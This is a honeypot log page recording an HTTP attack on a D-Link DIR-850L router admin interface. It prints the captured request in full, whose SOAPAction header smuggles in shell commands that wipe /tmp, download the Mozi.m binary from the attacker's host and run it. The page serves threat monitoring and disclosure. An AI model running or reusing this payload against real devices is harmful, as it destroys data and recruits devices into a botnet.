Report of Attack 219.157.242.125 (125.242.157.219.in-addr.arpa) http detail

Header

Time	2024/02/05, 07:58:44 (GMT)
Transaction ID	INX4FBFUHDOU4S2P
Service	http
Location	CN (China)
Attacker	219.157.242.125
Classification	D-link overflow
Harm Potential	High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content

POST /HNAP1/ HTTP/1.0
Host: 46.4.222.114:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://219.157.242.125:47296/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Detail

Header

Time

2024/02/05, 07:58:44 (GMT)

Transaction ID

INX4FBFUHDOU4S2P

Service

http

Location

CN (China)

Attacker

219.157.242.125

Classification

D-link overflow

Harm Potential

High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content